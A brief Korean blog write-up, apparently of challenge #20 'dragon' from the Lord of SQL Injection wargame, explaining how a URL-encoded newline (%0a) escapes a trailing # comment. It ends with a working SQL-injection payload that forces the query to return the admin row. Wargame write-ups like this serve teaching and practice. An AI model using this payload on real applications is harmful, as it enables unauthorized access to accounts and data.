$ 웹 해킹 $/los.rubiya.kr

[Lord of SQL_injection] #20 dragon

ws1004 2019. 4. 6. 01:02

문제를 확인해보면 id의값을 admin으로 만들면 되지만 id뒤에 #인 주석이 들어가 있습니다.

 

그래도 다행인것은 #주석은 한줄 주석이기때문에 %0a인 \n 줄바꿈을 이용하면 됩니다.

 

?pw=%0a and pw='' or id='admin